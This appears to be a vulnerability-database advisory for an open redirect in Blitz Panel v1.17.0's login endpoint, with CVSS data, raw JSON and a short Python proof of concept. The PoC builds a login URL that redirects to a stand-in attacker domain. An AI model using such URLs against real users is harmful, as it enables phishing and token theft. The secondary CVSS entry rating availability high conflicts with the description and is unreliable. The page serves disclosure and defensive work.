Security Vulnerability Report
中文
CVE-2025-60935 CVSS 6.1 MEDIUM

CVE-2025-60935

Published: 2025-12-24 15:16:02
Last Modified: 2026-01-15 02:22:46

Description

An open redirect vulnerability in the login endpoint of Blitz Panel v1.17.0 allows attackers to redirect users to malicious domains via a crafted URL. This issue affects the next_url parameter in the login endpoint and could lead to phishing or token theft after successful authentication.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:returnfi:blitz:1.17.0:*:*:*:*:*:*:* - VULNERABLE
Blitz Panel v1.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60935 PoC - Open Redirect in Blitz Panel v1.17.0 # Target URL with malicious next_url parameter target_url = "http://target-server:8080/login" malicious_domain = "https://attacker-controlled-site.com" # Construct malicious login URL with open redirect payload params = { "next_url": malicious_domain, "username": "[email protected]", "password": "any_password" } # The application will redirect user to malicious_domain after successful login # Attackers can use this for phishing or session hijacking # Example attack URL: # http://target-server:8080/login?next_url=https://attacker-controlled-site.com # Note: This PoC demonstrates the open redirect vulnerability. # Successful exploitation requires user interaction and valid credentials. print(f"Malicious URL: {target_url}?next_url={requests.utils.quote(malicious_domain, safe='')}") print("After successful login, user will be redirected to attacker's domain.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60935", "sourceIdentifier": "[email protected]", "published": "2025-12-24T15:16:01.860", "lastModified": "2026-01-15T02:22:45.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An open redirect vulnerability in the login endpoint of Blitz Panel v1.17.0 allows attackers to redirect users to malicious domains via a crafted URL. This issue affects the next_url parameter in the login endpoint and could lead to phishing or token theft after successful authentication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:returnfi:blitz:1.17.0:*:*:*:*:*:*:*", "matchCriteriaId": "3879916A-7BB7-404F-BE0B-31470CD59463"}]}]}], "references": [{"url": "https://gist.github.com/HEXER365/2e866b47d56585e1e59e7c16bf4b4db7", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ReturnFI/Blitz", "source": "[email protected]", "tags": ["Product"]}]}}